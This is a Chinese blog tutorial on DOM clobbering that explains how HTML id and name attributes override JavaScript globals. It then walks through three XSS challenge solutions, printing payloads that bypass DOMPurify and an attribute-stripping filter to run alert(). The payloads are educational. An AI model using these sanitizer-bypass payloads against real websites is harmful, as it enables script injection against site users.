Dom-clobbering原理和例题

最新推荐文章于 2024-09-30 15:42:36 发布
最新推荐文章于 2024-09-30 15:42:36 发布
阅读量747 收藏
点赞数
分类专栏: 网安 文章标签: 前端 javascript html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/132670739
版权

目录

引入

1.获取标签

2.覆盖

3.多层覆盖

利用Dom-clobbering

1.tostring

2.集合取值

3.层级关系取值

4.三层取值

5.自定义属性

例题

1

2.

3.

引入

分析

引入

        先用三个小例子看看dom-clobbering干了什么

1.获取标签

这个例子给img标签分别做了一个id和一个name属性,然后利用下面三种方式调用

结果显示:直接打印x,y和用window打印x,y都可以打印出来,但是用document只能用name获取标签,无法用id获取。

2.覆盖

这个例子可以看出原本是没有cookie这个属性的,然后我创建了一个div,再创建一个img,里面包含一个name属性,值为cookie。

接着把img放入div,把div放入document.body下,再调用document.cookie发现获取了这个img标签,这就说明document.cookie已经被我们用img标签给覆盖了

3.多层覆盖

document.body取出来的是form表单,然后.appendchild就是通过id取出的img标签,就不是原本的appendChild这个函数了。被覆盖掉了。

利用Dom-clobbering

        从上面引入我们已经知道了怎么获取、覆盖掉标签了,但是标签并不是我们要利用的,这些标签也只是一个HTMLElment元素,所以我们要找到可控的字符串来利用

1.tostring

tosting这个函数就是转换成字符串的,先写一个例子看看:

        

这个代码创建了一个函数A,然后a调用toSting方法,相当于一个子类调用父类的toString方法,可以发现显示了[object object]

因为标签都继承了object的toString方法,所以我们用一个脚本过滤下哪些标签的toString是可以利用的:

Object.getOwnPropertyNames(window)
.filter(p => p.match(/Element$/))
.map(p => window[p])
.filter(p => p && p.prototype && p.prototype.toString 
!== Object.prototype.toString)

这个脚本可以遍历所有的标签,找到不是继承object的tostring方法的属性,找到了两个标签,分别是<a>和<area>

接下来测试一下a的tostring方法:

alert(test)执行的时候,会通过id将a标签抓出来,然后a标签会调用tostring方法,关键就是这个,他的tostring方法不是继承的,而是自己写的:调用href的值,所以就成了将aaaaa拿出来

2.集合取值

先看下这个代码,a标签是div的子标签,这样调用会显示undefined

解决方法就是先用两个id都等于x来构建一个集合类,再通过collection[name]来获取a标签:

3.层级关系取值

先利用这个脚本筛选出能使用层级关系的组合

有以下几个:

form->button
form->fieldset
form->image
form->img
form->input
form->object
form->output 
div=document.createElement('div')
; for(var i=0;i<html.length;i++)
{
for(var j=0;j<html.length;j++) {
div.innerHTML='<'+html[i]+' id=element1>'+'<'+html[j]+' 
id=element2>'; document.body.appendChild(div);
if(window.element1 &&
element1.element2){ 
log.push(html[i]+','+html[j]);
}
document.body.removeChild(div);
}
}
console.log(log.join('\n'));

拿output举个例子:

这就是直接将ouput标签的值给拿出来了,利用的正是标签的层级关系

4.三层取值

需要利用到集合+层级关系

直接上代码:

<form id="x" name="y"><output id=z>I've been clobbered</output></form>
<form id="x"></form>
<script> 
alert(x.y.z.value)
;
</script>

这个就是上面两个的套用,不需要解释了。

5.自定义属性

上面2、3、4这三个都是用的id和name取值,还是有一定限制,如果自定义属性就方便多了

这个脚本可以过滤出能够自定义属性的

var html = [...]//HTML elements array 
var props=[]; 
for(i=0;i<html.length;i++){
obj =
document.createElement(html[i]); 
for(prop in obj) {
if(typeof obj[prop] === 'string') { 
try {
DOM.innerHTML = '<'+html[i]+' id=x 
'+prop+'=1>'; 
if(document.getElementById('x')[prop] == 1) {
props.push(html[i]+':'+prop);
}
}catch(e){}
}
}
}
console.log([...new Set(props)].join('\n'));

得到能利用的:

a:username
a:password

测试代码:

<a id=x href="ftp:Clobbered-username:Clobbered-Password@a">
<script>
alert(x.username)//Clobberedusername 
alert(x.password)//Clobberedpassword
</script>

结果:

例题

1

        XSS Game - Ok, Boomer | PwnFunction

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

思路就是把ok覆盖掉,把ok覆盖成一个自己写的标签,然后标签又能转换成字符串,就是用的a的tostring方法

所以payload先写成这样

<a id=ok href="alert(1337)">a</a>

结果没有弹窗,原因就是因为DOMPurify这个过滤框架

只能上官网查看白名单:

发现tel在白名单中,可以利用,所以最后payload是:

<a id=ok href="tel:alert(1)">a</a>

测试成功弹窗:

注意:

前提是这个ok是原本不存在的,如果ok是实际存在的,上述的就无法实现了

2.

const data = decodeURIComponent(location.hash.substr(1));
const root = document.createElement('div');
root.innerHTML = data;
 
// 这里模拟了XSS过滤的过程,方法是移除所有属性
for (let el of root.querySelectorAll('*')) {
    let attrs = [];
    for (let attr of el.attributes) {
        attrs.push(attr.name);
    }
    for (let name of attrs) {
        el.removeAttribute(name);
    }
}
 
document.body.appendChild(root);

先看题:

        1.创建一个div,然后把我们写入的hash值放进div中。

        2.第一个循环拿出了div所有元素,然后定义一个空数组attrs。

        3.第二个循环把所有元素放到数组里。

        4.第三个循把数组里的元素删除,最后把过滤后的div放到body中。

简单来说就是个过滤函数,将所有元素过滤,我们的目标是弹窗

那么思路就是防止form属性被删除,利用双层获取值,使for循环报错跳出

先测试:

<form><input id=attributes></form>

结果:报错了,原因是因为数组里只有一个值不是一个可迭代对象(最少两个元素,可以被for循环)

那么久加一个Input,形成一个集合,让这个数组有至少两个元素,可以遍历

此时能弹窗,但大问题是需要用户交互,这明显不行

直接看最终payload来理解:

 <style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"><input id=attributes><input id=attributes></form>

先在style中创建一个动画样式,然后再form表单中调用这个样式,然后属性onanimationstart来执行alert(1)(onanimationstart这个属性作用就是动画加载前所要执行的内容)

然后form表单中包含了两个input标签,是为了让函数报错用的

过滤函数的执行流程:

先style,发现没有属性,又到form,里面有元素,但是元素的attributes被DOM破坏成了两个input,循环了两次拿到两个空值,所以form的属性仍是完整的

继续循环到input了,删掉了,第二个也删掉了,这个input删掉无所谓,因为Input的作用就是保证form完整,并且已经完成了

总结一下:

在动画触发之前加alert(1),然后保证form里面的属性不可以被删除,就利用上述方法使过滤函数报错,结果form绕过过滤,并且没有用户交互

最后成功弹窗:

3.

XSS Game - Jason Bourne | PwnFunction

引入

<script>
    /* Helpers */
    const bootstrapAlert = (msg, type) => {
        return (`<div class="alert alert-${type}" role="alert">${DOMPurify.sanitize(msg)}</div>`)
    }
 
    document.getAlert = () => document.getElementById('alerts');
</script>
 
<script>
    /* Welcome */
    let name = (new URL(location).searchParams.get('name')) || "Pamela Landy";
    document.write(
        bootstrapAlert(`<b>Operation Treadstone</b>: Welcome <u>${name}</u>.`, 'info')
    )
</script>
 
<!-- alerts -->
<div id="alerts"></div>
 
<script>
    /* Handle to `#alert` */
    let alerts = document.getAlert();
 
    /* Treadstone Credentials */
    let identification = Math.random().toString(36).slice(2);
    let code = Math.floor(Math.random() * 89999 + 10000);
 
    /* Default Credentials */
    DEFAULTS = {};
    DEFAULTS[identification] = code;
</script>
 
<script>
    /* Optional Comment */
    if (location.hash) {
        let comment = document.createComment(decodeURI(location.hash).slice(1));
        document.querySelector('#alerts').appendChild(comment);
    }
</script>
 
<script>
    /* Use `DEFAULTS` to init `SECRETS` */
    SECRETS = DEFAULTS
 
    /* Increment the `code` before the check */
    let secretKey = new URL(location).searchParams.get('key') || "TREADSTONE_WEBB";
    SECRETS[secretKey] += 1;
 
    /* Authorization Check */
    if (SECRETS[secretKey] === SECRETS[identification]) {
        confirm(`Jesus Christ, it's Jason Bourne!`)
    } else {
        confirm(`You ain't David Webb!`)
    }
</script>

先把每个script拆开看:

        <script>
    /* Helpers */
    const bootstrapAlert = (msg, type) => {
        return (`<div class="alert alert-${type}" role="alert">${DOMPurify.sanitize(msg)}</div>`)
    }
 
    document.getAlert = () => document.getElementById('alerts');
</script>

定义了两个函数,第一个返回了被dompurify过滤的参数msg放到div中,第二个函数用于获取id为alerts的元素

<script>
    /* Welcome */
    let name = (new URL(location).searchParams.get('name')) || "Pamela Landy";
    document.write(
        bootstrapAlert(`<b>Operation Treadstone</b>: Welcome <u>${name}</u>.`, 'info')
    )
</script>

<!-- alerts -->
<div id="alerts"></div>

变量name用get接一个参数name,然后调用bootstrap显示欢迎$name的样式,然后定义一个id为alerts的div

<script>
    /* Handle to `#alert` */
    let alerts = document.getAlert();
 
    /* Treadstone Credentials */
    let identification = Math.random().toString(36).slice(2);
    let code = Math.floor(Math.random() * 89999 + 10000);
 
    /* Default Credentials */
    DEFAULTS = {};
    DEFAULTS[identification] = code;
</script>

把getalert()函数的返回值给alert变量,然后分别生成两个随机数给到DEFAULT对象,identification是键,code是值

<script>
    /* Optional Comment */
    if (location.hash) {
        let comment = document.createComment(decodeURI(location.hash).slice(1));
        document.querySelector('#alerts').appendChild(comment);
    }
</script>

判断hash是否存在,如果存在就取#后面的内容,然后添加搭配id为alerts的元素中

 
<script>
    /* Use `DEFAULTS` to init `SECRETS` */
    SECRETS = DEFAULTS
 
    /* Increment the `code` before the check */
    let secretKey = new URL(location).searchParams.get('key') || "TREADSTONE_WEBB";
    SECRETS[secretKey] += 1;
 
    /* Authorization Check */
    if (SECRETS[secretKey] === SECRETS[identification]) {
        confirm(`Jesus Christ, it's Jason Bourne!`)
    } else {
        confirm(`You ain't David Webb!`)
    }
</script>

把对象DEFAULTS赋给SECRETS,然后secretKey用get接一个参数key,然后让SECOETS对象中的secretKey建加一,如果没有就是创建一个新的键值对,建为secretKey,最后判断一下SECRETS[secretKey] 和SECRETS[identification]是否严格相等

分析

直接看payload来分析:

?name=<img name=getAlert><form id=alerts name=DEFAULTS>&key=innerHTML#--><img src οnerrοr=alert(1337)>

我们根据payload倒着分析

要让这个<img src οnerrοr=alert(1337)>成功弹窗就要让前面的闭合,那么就&key=innerHTML#-->

来写入,就会形成form.innerHTML+1,可以成功闭合注释符,就能成功弹窗。

innerHTML是通过key写给SECRETS的,但是到了form上,说明form成功覆盖了DEFAULTS,

所以在第五个script时 SECRETS = DEFAULTS就成了form.innerHTML了

现在解释下form怎么覆盖DEFAULTS的:

因为第三个script中getalert()函数因为接了我们传入的name=<img name=getAlert>报错了,所以这个script就不会执行下去,也就无法定义DEFAULTS对象了,然后form成功上位

还有一个点:

我们form中有一个id为alert,但是代码中还有一个div的id也为alert

document.querySelector('#alerts').appendChild(comment);这个代码之所以接的是我们写入的form

原因就是appendChild只认第一个标签,我们的form在div前,所以才成功被添加成功。       

总结一下:

?name=<img name=getAlert><form id=alerts name=DEFAULTS>&key=innerHTML#--><img src οnerrοr=alert(1337)>

        先传一个img使getAlert函数报错,导致DEFAULTS无法定义,又因为id与div的id相同但是在div之前,所以被加入元素,name为DEFAULTS又在第五个script成功赋给SECRETS,接着接到的key值接收了一个innerHTML来赋给form形成form.innerHTML+1来闭合标签,最后用img的onerror来弹窗

 

vt_yjx
关注
专栏目录
AFL源码分析之afl-fuzz.c详细注释(二):FUZZ执行流程(五万字警告,慎入)
hollk’s blog
12-17 2344
fuzz主流程一路跟下来见识到变异的巧妙,不禁感叹变异规则的强大,AFL源码注释章节系列到本文为止就结束了,内容一如既往地多,差不多有五万字左右。后续在第二阶段中会对fuzzing 101进行练习记录,如果感兴趣可以订阅模糊测试专栏~
CUDA:使用每个GPU一个进程进行计算的进程间通信的实例
希望我的博客,能帮上你解决学习中工作中所遇到的问题
12-21 202
CUDA:使用每个GPU一个进程进行计算的进程间通信的实例
DOM clobberingDOM破坏)
m0_63306943的博客
04-02 509
alert(x.y);执行结果:这里无论第一个标签怎么组合,得到的结果都只有undefined。所以说标签不能乱取。
XSS当中的DOM clobbering
rv0p111
08-11 634
DOM clobberingHow to exploit DOM-clobbering vulnerabilitiesExploiting DOM clobbering to enable XSS 主要是学习了下这个相关的知识点,目的只是想要记录下分析过程,介绍的话就直接引用相关文章的内容了 DOM 破坏是一种将 HTML 注入页面以操作 DOM 并最终更改页面上 JavaScript 行为的技术。DOM clobbering 在XSS不可能的情况下特别有用,但您可以控制页面上的某些 HTML,其中属性i
DOM Clobbering原理及应用
m0_46467017的博客
08-02 324
现在请你用最短的代码,实现出点击按钮时会跳出alert(1)这个功能。那如果要让代码最短,你的答案会是什么?
通过id获取input标签元素对象_学点新姿势: 通过DOM Clobbering 引发GMail的的XSS
weixin_39714275的博客
11-29 498
什么是AMP4EmailAMP4Email(也称为动态邮件)是Gmail的一项新功能,可使电子邮件包含动态HTML内容。尽管编写包含HTML标签的电子邮件已经存在了很多年,但通常情况下都是假定HTML只包含静态内容,即某种格式,和一些图像等,而没有任何脚本形式的存在。AMP4Email应该算是创新的更进了一层,它允许编写包含HTML标签的电子邮件并允许电子邮件中包含动态内容。在Google官方G ...
Dom破坏(Dom Clobbering
weixin_57507186的博客
09-30 200
文档对象模型(DOM)允许JavaScript对其进行操作。我们可以对HTML插入特定id或name的标签,来达到执行命令时使命令错误的指向我们自定义标签的目的。
GMail XSS 漏洞分析
neal1991的专栏
11-20 1283
原文:https://research.securitum.com/xss-in-amp4email-dom-clobbering/ 译者:https://github.com/neal1991 这篇文章是我在2019年8月通过 Google 漏洞奖励计划报告的 AMP4Email 中已经修复的 XSS 的文章。该 XSS 是对著名浏览器问题 DOM Clobbering 的真实利用案例。 ...
Mask R-CNN代码分析(二)
lscelory的博客
08-06 6865
二、Mask R-CNN代码解读 FAIR在发布detectron的同时,也发布了一系列的tutorial文件,接下来将根据Detectron/GETTING_STARTED.md文件来解读代码。 先来看一下detectron的文件结构。 config中是训练和测试的配置文件,官方的baseline的参数配置都以.yaml文件的形式存放在其中。 demo一些图像示例还有分割好的结果。 ...
从零开始之驱动发开、linux驱动(九、linux的异常处理流程)
To_run_away的博客
09-08 2157
在学习裸机的时候我们知道,异常的触发分为下面几个过程: 1.设置好异常向量表(把异常向量表放在异常向量的位置) 2.写异常处理函数 3.执行异常处理   下面列出简单的代码实现 .text .global _start .global __reset_exception .global __undefined_instruction .global __software_inter...
DOM破坏绕过XSSfilter例题
middlecorn的博客
09-02 480
DOM破坏(DOM Clobbering)指的是对网页上的DOM结构进行不当的修改,导致页面行为异常、性能问题、安全风险或其他不良影响的情况。就是⼀种将 HTML 代码注⼊⻚⾯中以操纵 DOM 并最终更改页面上 JavaScript 行为的技术这里我们举一些例子就能更好地解释可以看到打印的结果如下通过打印<img>标签中的id或者name属性值,我们获取到了整个<img>标签从中我们也发现了规律,直接打印x,y不管是id还是name都可以打印出来。
XSS注入进阶练习篇(二)DOM型XSS注入深入
好好睡觉
02-19 3087
DOM型XSS,SVG绕过WAF、DOM 破坏
XSS漏洞:一道关于DOM型XSS的题目
qq_68163788的博客
01-22 1253
DOM型XSS(Document Object Model Cross-Site Scripting)是一种特定类型的跨站脚本攻击,它利用了浏览器中的DOM(文档对象模型)来执行恶意脚本。与传统的反射型XSS和存储型XSS不同,DOM型XSS攻击并不涉及将恶意脚本存储在服务器端,而是利用客户端的DOM来执行攻击。 DOM型XSS的攻击载荷(payload)会修改页面的DOM结构,通过操纵JavaScript代码来执行恶意操作。这种类型的攻击通常发生在客户端的JavaScript代码中,而不是在服务端的响应
dom型xss ---(waf绕过)
m0_63306943的博客
04-05 1462
DOM 是文档对象化模型(Document Object Model)的简称。DOM Tree 是指通过 DOMHTML 页面进行解析,并生成的 HTML tree 树状结构和对应访问方法。借助DOM Tree,我们能直接而且简易的操作HTML页面上的每个标记内容DOM技术被Internet Explorer 5.0及以上版本的浏览器所支持,它采取一种非常直观且一致的方式将HTML文档进行模型化处理,并借此提供访问、导航和操作页面的简易编程接口。
DVWA靶场练习十—XSS (DOM)
afei001
06-30 385
一、低级(Low Level) 尝试直接在URL中注入: <script>alert(document.cookie)</script> 成功返回Cookie。      源码分析: <?php # No protections, anything goes ?> 分析:     可以看到,该源码中没有任何内容,没有做任何xss防护。容易造成xss DOM攻击。   二、中级(Medium Level) 首先查看源码: <?php // Is the.
html DOM 变化 通知,很好很强大
weixin_34238642的博客
09-22 126
刚做一个项目,某个div标签显示后 需要接收一个事件,用于主动调用 window.resize(); 从网上找了了,发现MutationObserver。给开发者们提供了一种能在某个范围内的DOM树发生变化时作出适当反应的能力。 测试代码如下。保存成html文件即可运行 1 <html> 2 <head> 3 <title><...
DOM破坏攻击学习
蚁景网安学院
04-16 747
01前言最近看到好多师傅都已经学习过了DOM Clobbering Attack,因此自己也来学习一波。020x01 简介DOM最初诞生的时候没有一个很好的标准,以至于各个浏览器在实现...
title属性样式 原生dom_DOM破坏攻击学习
weixin_33603316的博客
12-28 403
01前言最近看到好多师傅都已经学习过了DOM Clobbering Attack,因此自己也来学习一波。020x01 简介DOM最初诞生的时候没有一个很好的标准,以至于各个浏览器在实现的过程中会支持DOM的一些怪异行为,而这些行为可能会导致DOM Clobbering的发生浏览器可能会将各种DOM元素的name和id属性添加为document的属性或页面的全局变量,这会导致覆盖掉docu...
Gmail中AMP4Email所导致的XSS漏洞
NOSEC2019的博客
11-19 859
这篇文章讲述的是我在2019年8月向谷歌报告的XSS漏洞,和Gmail中的AMP4Email有关,这也是被称为DOM Clobbering攻击手法的具体实现。 什么是AMP4Email AMP4Email(也称为动态邮件)是Gmail的一个新特性,它能让电子邮件包含动态HTML内容。虽然很久以前就能编写含有HTML标记的电子邮件,但这通常只包是静态内容,即某种格式、图像等,不含任何脚本或表单。而...
登录功能开发 P167重点
最新发布
2303_81204446的博客
09-30 203
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值